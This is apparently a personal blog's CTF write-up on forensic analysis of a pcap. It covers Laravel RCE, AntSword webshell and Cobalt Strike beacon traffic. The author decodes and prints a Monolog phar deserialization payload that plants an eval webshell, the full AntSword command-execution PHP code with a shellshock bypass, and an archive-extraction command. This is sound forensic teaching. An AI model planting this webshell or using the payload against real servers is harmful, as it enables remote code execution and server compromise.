Traffic analysis in Lvcheng Cup

Comments

Introduction

Target: FIND THE FLAG(hint : AntSwort traffic)

Personally I think this problem is challenging for me,it contains Cobalt Strike traffic analysis, laravel Rce traffic analysis and AntSwort traffic analysis.

AntSword and Laravel RCE Traffic Analysis

There are many packets in the pcap file,personally I’’ll use http.request.method==POST to filter http traffic beacuse most of webshell are use post method sends data to victims.Obviously there are too many packets contains ignition field, after googling, I found that this is Laravel RCE explotiation.

paste image
Following figure shows that .config.php were frequently requested ,follow it in HTTP stream, obviously the webshell executed ls command.

paste image
paste image

node1

Keep following requests which connnected to config.php,we can find a pacaket made an extract operation and the file name is secret.zip,this file is suspicious and it should be recovered .After extarcing HTTP objects I haven’t find secret.zip,so keep following packets.
paste image
paste image

node1 end

In a packet we find PK filed in response data,so it should be recovered with zip file format.There is one thing to note,in the start and end postions of response data exists hex data,AntSword added it to reduce traffic character.

paste image

Use 010 editor to recover this file ,then open it, but it tips me password are required,now I didn’t find any passwords,after fix ,check and broute tools I still can’t open it.So I have to find the password.We can find that the secret file is .cobaltstrike.beacon_keys file ,it’s serialized file contains public and private key.If we can crack the password and recover private key, the ciphertext between hacker and coblatstrike teamserver will be cracked.

In node 1 we find an extract command were executed, so next setp is recover webshell contents and know the exact command, it must contains exact password.The webshell were written by Laravel RCE, so we should find what hacker did via Laravel RCE exploitation.

1
P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00+=00D=00Q=00o=00J=00A=00g=00A=00A=00A=00g=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00C=00y=00A=00Q=00A=00A=00Y=00T=00o=00y=00O=00n=00t=00p=00O=00j=00c=007=00T=00z=00o=00z=00M=00j=00o=00i=00T=00W=009=00u=00b=002=00x=00v=00Z=001=00x=00I=00Y=00W=005=00k=00b=00G=00V=00y=00X=00F=00N=005=00c=002=00x=00v=00Z=001=00V=00k=00c=00E=00h=00h=00b=00m=00R=00s=00Z=00X=00I=00i=00O=00j=00E=006=00e=003=00M=006=00O=00T=00o=00i=00A=00C=00o=00A=00c=002=009=00j=00a=002=00V=000=00I=00j=00t=00P=00O=00j=00I=005=00O=00i=00J=00N=00b=002=005=00v=00b=00G=009=00n=00X=00E=00h=00h=00b=00m=00R=00s=00Z=00X=00J=00c=00Q=00n=00V=00m=00Z=00m=00V=00y=00S=00G=00F=00u=00Z=00G=00x=00l=00c=00i=00I=006=00N=00z=00p=007=00c=00z=00o=00x=00M=00D=00o=00i=00A=00C=00o=00A=00a=00G=00F=00u=00Z=00G=00x=00l=00c=00i=00I=007=00c=00j=00o=00z=00O=003=00M=006=00M=00T=00M=006=00I=00g=00A=00q=00A=00G=00J=001=00Z=00m=00Z=00l=00c=00l=00N=00p=00e=00m=00U=00i=00O=002=00k=006=00L=00T=00E=007=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00i=00d=00W=00Z=00m=00Z=00X=00I=00i=00O=002=00E=006=00M=00T=00p=007=00a=00T=00o=00w=00O=002=00E=006=00M=00j=00p=007=00a=00T=00o=00w=00O=003=00M=006=00N=00z=00c=006=00I=00m=00V=00j=00a=00G=008=00g=00X=00j=00w=00/=00c=00G=00h=00w=00I=00E=00B=00l=00d=00m=00F=00s=00K=00E=00B=00n=00e=00m=00l=00u=00Z=00m=00x=00h=00d=00G=00U=00o=00Y=00m=00F=00z=00Z=00T=00Y=000=00X=002=00R=00l=00Y=002=009=00k=00Z=00S=00g=00k=00X=001=00B=00P=00U=001=00R=00b=00M=00T=00Q=000=00M=00z=00N=00d=00K=00S=00k=00p=00O=00z=009=00e=00P=00i=00A=00+=00I=00C=005=00j=00b=002=005=00m=00a=00W=00c=00u=00c=00G=00h=00w=00I=00j=00t=00z=00O=00j=00U=006=00I=00m=00x=00l=00d=00m=00V=00s=00I=00j=00t=00O=00O=003=001=009=00c=00z=00o=004=00O=00i=00I=00A=00K=00g=00B=00s=00Z=00X=00Z=00l=00b=00C=00I=007=00T=00j=00t=00z=00O=00j=00E=000=00O=00i=00I=00A=00K=00g=00B=00p=00b=00m=00l=000=00a=00W=00F=00s=00a=00X=00p=00l=00Z=00C=00I=007=00Y=00j=00o=00x=00O=003=00M=006=00M=00T=00Q=006=00I=00g=00A=00q=00A=00G=00J=001=00Z=00m=00Z=00l=00c=00k=00x=00p=00b=00W=00l=000=00I=00j=00t=00p=00O=00i=000=00x=00O=003=00M=006=00M=00T=00M=006=00I=00g=00A=00q=00A=00H=00B=00y=00b=002=00N=00l=00c=003=00N=00v=00c=00n=00M=00i=00O=002=00E=006=00M=00j=00p=007=00a=00T=00o=00w=00O=003=00M=006=00N=00z=00o=00i=00Y=003=00V=00y=00c=00m=00V=00u=00d=00C=00I=007=00a=00T=00o=00x=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00f=00X=001=00p=00O=00j=00c=007=00a=00T=00o=003=00O=003=000=00F=00A=00A=00A=00A=00Z=00H=00V=00t=00b=00X=00k=00E=00A=00A=00A=00A=00X=00E=00t=00L=00Y=00Q=00Q=00A=00A=00A=00A=00M=00f=00n=00/=00Y=00t=00g=00E=00A=00A=00A=00A=00A=00A=00A=00A=00I=00A=00A=00A=00A=00d=00G=00V=00z=00d=00C=005=000=00e=00H=00Q=00E=00A=00A=00A=00A=00X=00E=00t=00L=00Y=00Q=00Q=00A=00A=00A=00A=00M=00f=00n=00/=00Y=00t=00g=00E=00A=00A=00A=00A=00A=00A=00A=00B=000=00Z=00X=00N=000=00d=00G=00V=00z=00d=00D=00Z=006=00P=00U=00p=00j=00h=00k=00a=00y=00y=00N=00i=00Q=003=00Y=00w=00m=00f=00p=00c=008=00Q=00J=00n=00s=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=00

Replacing =00 to null then base64 decode it, we can get the webshell contents.

1
2
<?php __HALT_COMPILER(); ?>
	�a:2:{i:7;O:32:"Monolog\Handler\SyslogUdpHandler":1:{s:9:"*socket";O:29:"Monolog\Handler\BufferHandler":7:{s:10:"*handler";r:3;s:13:"*bufferSize";i:-1;s:9:"*buffer";a:1:{i:0;a:2:{i:0;s:77:"echo ^<?php @eval(@gzinflate(base64_decode($_POST[14433])));?^> > .config.php";s:5:"level";N;}}s:8:"*level";N;s:14:"*initialized";b:1;s:14:"*bufferLimit";i:-1;s:13:"*processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}i:7;i:7;}dummy\KKa~ضtest.txt\KKa~ضtesttest6z=Jc�F��ؐ݌&~�<@��GBMB

are webshell.We can decode traffic after base64 and gzip decode.

1
2
3
4
5
14433=c0gtS8zRcEivysxLy0ksSdVISixONTOJT0lNzk9J1VCJD/APDomON6gwSDFJNUpJNUs2TEs0j9XU1LQGAA==
_0x0d4e2de6c1fa7=jVZtT9tIEP5+v2JZWcRWTZy3o5Q9U6MqVSvRAxF0fCiV5dhrsodjW7sOgUv8329m/ZYA1ysI5JmdeXbeZz2RCl/xwqSRUHkSPPtcykwqahM6oBbz4MwvxJL7iViKwhxYzMjySEjXQ8171MxynvrzQHFgg4qIzUrEIhsjC9eRC99psOSm4c+m139Nr7/T2afrr1c3/uevF9M/z79N6Q8NG0jp5pLf+2AJ3EUdtj11qF2jMQ/OwcB8pRZmJW1rfFs9K7TEL/gy90HUtCwWZ5IHYSNIAkUMAedgE9h34Anlr6UognkCZukDaxNmaSHSFWclM4ol+qhP+tTpxzyKhpR5yweEr061pwdeLBLu8yehCtUc7EJ54WJXxWvjvRc1iHa/D7EzwrTAKHh7YbiDn+2dg6GoYcA7MNsdMEP8ocQ/PIOYV6qAId69szb1vRVs+Z/3UgeTLJe7Ns4hcg+gUzIWr9KwEFkK8eNpCMFcFdZG8mIlU4IEyOyIACNfFaa1MaovN5vrvGA0eArxsRhweBr5YcKDFEgeLjJCx8e0TyfxiFa0110GII3QZARCcQxZKAFEga9wEyvk88bIXfTneOJHPMwibqrVXBXgj391Obv5TuOT42E0/jAZvh+MJhP6wx5BfRjq50qreB6Nx7+fjE7i8SBulHj6CEKu91PV+WQ8mI+Hg5PxSfBh3Kj+ahuEbgMX2QN7aLku5OgjPQrJHd0Yqryj9JQ6OxSW4RsqUAIQPTDYpFfnN19c2odUtCS1+vTUWSnpJFkYJI6ai3SXbsnuQH9UJPzDquKJ4v97C/t06tyKNMrWyoFGhYYaj3Z5s2d1e3l7PNnhvTjWKg3jKltzOVvwJHEeh/2Bw9AQbETo/eLZrDMELYhf2Er8KU8wSXS73QYqESmHD2i4RrKbFJWCHhWPek6QFvXRAkbjKWj5ksOwDBvUB/5cgVIXkUGalWVpSBdylJcwBsOSdo0SQwnEYGDU2WZTu5unMIlxLvmNgqKWnjW1LZGldfUwNJssNAx/GeRmr5Bi2bN3GGBykSUYup6NAKysmths7mgnWGwdHsJwhBpIquGIjAOR+tV9Rlzrd+7IVaowH2qRhQ9YgsQI6/B1ZUkGNhlaxHUJlCY5PMQg9Kp49iykTWTo3eMn2T3wtlstswxE0rOsBrCQCAgJiyCTDzAboRQdtaAWxB6aEj7IgUs+n1/Mprh+imVOXIJ7ATrPfL0nbNILVM9ibQ1/ufIvLi9cE5TJEyMlA2fImcYZnR0O9Xp7ZSsIt5RJA4quspJgYsgGHQCmNxy97w/gd4hl0vwdzR+xfhvZerJ+DoBiZT0AwYFqyeyNUjQJJvcq1XGoKDStUYIoUAjGJpciLbpZWt9wI3E3lfv37aU0XEawUqDSQAb3zC+OLyhTDE7V6BCZjVd9ApaNUHW91mJ5oFSxkCst2BBvi+oSgyrlIQpXXnkdE23dV2hEvfoY3go1bKX8dyZSk/6Gz4sXmjmuSFQ14hw2MVKo35NQKOsFZAK3vl65cd7ZEkN6sH9yezSYnCCkl4dJprgW279AZqHfXoIV6rUsvIlUvTYk7ln92ctFzntQrese1Ozo7QM4MUT20kaRfR/+eGWm5raWvtIYvakx6jS8uPatgme79Ahp7VDNe+F+APXb1UdLYQpbuTeHitV2CCayld1ffgduPWG8MIGKagYb/XT5jWK4127K1wQos3c7C6XIi76+qYfr3TXWR2dNPcEbIXMNfnQ2K6JLfNcwvLbvAvvo7BpG0HmSIFPxRmoq5Y4U35Wq+7Cra91ZkHqYC800rt3SAK7XNKHs02b2aBCiUQ7cgfWRoqAGKuFRQBkrw6CAVTZ9CnmuO9ng1qZ6P02vry+vT+ER2UdjIaffuFLBPccVwrq3G4sEsv4F
b430b310838a93=4g
f861d394170244=X4Y21k
ufbd335828f30f=0bY2QgL2QgIkQ6XFxwaHBzdHVkeV9wcm9cXFdXV1xcc2VjcmV0IiYiQzpcUHJvZ3JhbSBGaWxlc1w3LVppcFw3ei5leGUiIHggc2VjcmV0LnppcCAtcFA0VWs2cWtoNkd2cXdnM3kmZWNobyAzNzhkZjJjMjM0JmNkJmVjaG8gZmI3Zjhm

Above encryped data are webshell commands which executing extract zip file,decode it with base64 and gzip, we can get the source code of server send to client.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
	$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
	$oparr=preg_split("/;|:/",$opdir);
	@array_push($oparr,$ocwd,sys_get_temp_dir());
	foreach($oparr as $item) {
		if(!@is_writable($item)) {
			continue;
		}
		;
		$tmdir=$item."/.fedd1";
		@mkdir($tmdir);
		if(!@file_exists($tmdir)) {
			continue;
		}
		@chdir($tmdir);
		@ini_set("open_basedir", "..");
		$cntarr=@preg_split("/\\\\|\//",$tmdir);
		for ($i=0;$i<sizeof($cntarr);$i++) {
			@chdir("..");
		}
		;
		@ini_set("open_basedir","/");
		@rmdir($tmdir);
		break;
	}
	;
}
;
;
function asenc($out) {
	return $out;
}
;
function asoutput() {
	$output=ob_get_contents();
	ob_end_clean();
	echo "36"."4f2";
	echo @asenc($output);
	echo "42"."ff1";
}
ob_start();
try {
	$p=base64_decode(substr($_POST["f861d394170244"],2));
	$s=base64_decode(substr($_POST["ufbd335828f30f"],2));
	$envstr=@base64_decode(substr($_POST["b430b310838a93"],2));
	$d=dirname($_SERVER["SCRIPT_FILENAME"]);
	$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";
	if(substr($d,0,1)=="/") {
		@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
	} else {
		@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
	}
	if(!empty($envstr)) {
		$envarr=explode("|||asline|||", $envstr);
		foreach($envarr as $v) {
			if (!empty($v)) {
				@putenv(str_replace("|||askey|||", "=", $v));
			}
		}
	}
	$r="{$p} {$c}";
	function fe($f) {
		$d=explode(",",@ini_get("disable_functions"));
		if(empty($d)) {
			$d=array();
		} else {
			$d=array_map('trim',array_map('strtolower',$d));
		}
		return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));
	}
	;
	function runshellshock($d, $c) {
		if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
			if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
				$tmp = tempnam(sys_get_temp_dir(), 'as');
				putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
				if (fe('error_log')) {
					error_log("a", 1);
				} else {
					mail("a@127.0.0.1", "", "", "-bv");
				}
			} else {
				return False;
			}
			$output = @file_get_contents($tmp);
			@unlink($tmp);
			if ($output != "") {
				print($output);
				return True;
			}
		}
		return False;
	}
	;
	function runcmd($c) {
		$ret=0;
		$d=dirname($_SERVER["SCRIPT_FILENAME"]);
		if(fe('system')) {
			@system($c,$ret);
		} elseif(fe('passthru')) {
			@passthru($c,$ret);
		} elseif(fe('shell_exec')) {
			print(@shell_exec($c));
		} elseif(fe('exec')) {
			@exec($c,$o,$ret);
			print(join("
",$o));
		} elseif(fe('popen')) {
			$fp=@popen($c,'r');
			while(!@feof($fp)) {
				print(@fgets($fp,2048));
			}
			@pclose($fp);
		} elseif(fe('proc_open')) {
			$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
			while(!@feof($io[1])) {
				print(@fgets($io[1],2048));
			}
			while(!@feof($io[2])) {
				print(@fgets($io[2],2048));
			}
			@fclose($io[1]);
			@fclose($io[2]);
			@proc_close($p);
		} elseif(fe('antsystem')) {
			@antsystem($c);
		} elseif(runshellshock($d, $c)) {
			return $ret;
		} elseif(substr($d,0,1)!="/" && @class_exists("COM")) {
			$w=new COM('WScript.shell');
			$e=$w->exec($c);
			$so=$e->StdOut();
			$ret.=$so->ReadAll();
			$se=$e->StdErr();
			$ret.=$se->ReadAll();
			print($ret);
		} else {
			$ret = 127;
		}
		return $ret;
	}
	;
	$ret=@runcmd($r." 2>&1");
	print ($ret!=0)?"ret={$ret}":"";
	;
}
catch(Exception $e) {
	echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();

We can see that parameter s receive parameter ufbd335828f30f’s value.

1
$s=base64_decode(substr($_POST["ufbd335828f30f"],2));

so, s=

/d "D:\\phpstudy_pro\\WWW\\secret"&"C:\Program Files\7-Zip\7z.exe" x secret.zip -pP4Uk6qkh6Gvqwg3y&echo 378df2c234&cd&echo fb7f8f
1

The password was found,P4Uk6qkh6Gvqwg3y.Then extract beacon_keys file.We can recover serialized private key by https://github.com/WBGlIl/CS_Decrypt.

paste image

From RSA key we can recover AES key in traffic ,usually the encryped data located in cookie field.

paste imagepaste image

From AES key we can recover totally communication contents,according to cobalt strike traffic characetristics,we can get beacon’s task execution results from the pacakage which POST DATA to submit.php?id=xxx.

paste image

Note that data should be base64 format,then use script decode it.

paste image

So beacon’s task execution result were shown in above figure, it contains the flag what we want.

Reference

https://blog.csdn.net/qq_43264813/article/details/120560209

https://wbglil.gitbook.io/cobalt-strike/cobalt-strike-yuan-li-jie-shao/cs-mu-biao-shang-xian-guo-cheng#beacon-shu-ju-hui-chuan

https://www.wkr.moe/ctf/610.html#toc-head-3

  • Copyright Notice: All articles in this blog, unless otherwise stated, are under the CC BY 4.0 CN agreement.Reprint please indicate the source!

PoloCTFer&Cybersec Researcher

Wong